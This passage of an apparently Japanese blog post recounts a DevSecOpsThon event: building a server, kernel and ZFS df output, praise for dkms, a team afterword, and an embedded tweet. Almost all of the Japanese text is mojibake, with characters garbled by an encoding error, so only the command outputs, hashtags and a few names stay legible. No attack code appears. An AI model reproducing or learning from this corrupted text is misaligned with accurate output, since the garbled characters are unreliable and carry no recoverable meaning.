4.18.0-425.19.2ã®verã§ããããš(ãããæ°ããã«ãŒãã«verã®ãã)
Linux [hostname] 4.18.0-425.19.2.el8_7.x86_64 #1 SMP Tue Apr 4 05:30:47 EDT 2023 x86_64 x86_64 x86_64 GNU/Linux
dfçµæã¯äžèšãèŠããŠããããš
zpool1/www_html 97G 62G 36G 64% /var/www/html
zpool1 36G 128K 36G 1% /zpool1
å人çãªææ³
dkmsã¯å倧ã
dkmsã¯ã©ããã§äœ¿ã£ãããšããã£ãããããããæ±çšæ§ãçšéãã€ãã§ã«èª¿ã¹ãããã«ããã
10. åé¡ïŒïŒ
åé¡
åé¡ãšèšãããã¬ãŒã³ããŒã·ã§ã³ã§ããã
ã©ããããŒã ã家ã«åž°ã£ããèªå®
ãµãŒããŒç«ãŠãŸããèªå®
ãµãŒããŒç«ãŠãŠããŸããªã©ãšãŠãæãããçºè¡šã§ããã
èªå® ãµãŒããŒã¯ã€ã³ãã©çãåŠã¶äžã§ã¯ãªãããã¯ãã£ãã»ããããã®ã§å°å ¥ããããšã匷ãããããããŸãã
Atogaki (ç·šéåŸèš)
team AãšããŠä»ã®åå è ã®æ¹ãšäºã決ããããteamã§åºé¡ãããåé¡ãšèè€ããŸãããæãããïŒäœãšçµæã«ãªããŸããããããã§åŸãããåŠã³ã¯èªåã«ãšã£ãŠãšãŠãæ°é®®ãªãã®ãšãªããŸããããµãŒããŒæ§ç¯ãªã©æ¬åœã«ïŒãããããã®ããšãç¥ãããšæãããã£ãããšãªã£ãŠããŸãã
èïŒå·¥åŠéšæ
å ±å·¥åŠç§3幎
ã ã[suisan (@u_i_san)]
â»å€æŽå±¥æŽ
5/3(æ°Ž) 16:40 çŸåš
確èªãåã次第åé¡æã解説ã®æ¹ã¯èŒããããŠããããŸãã
5/3(æ°Ž) 19:00
確èªã®ãããªãç¯å²ã§æžãå ããéäžã§ãã
5/8(æ)ã10:45
ãã¹ãŠèšé²ããŸããã
ïŒäœã ã£ã
â su-i-san (@u_i_san) April 30, 2023
åŠã³ã«ã€ããŠã¯å€ãã£ãã®ã§ãä»ãããŸãšããŸãïŒããšå¶çŽä»ãã®ãµãŒããŒäœããŸãïŒ
ã€ãã³ãã«ã€ããŠã¯æ¬¡ã®ISUCONãšãåæŠããããªïŒïŒ
èªå® ãµãŒããŒå¢ãå€ãããã#GMOkitaQ#DevSecOpsThon pic.twitter.com/93m94L7YiN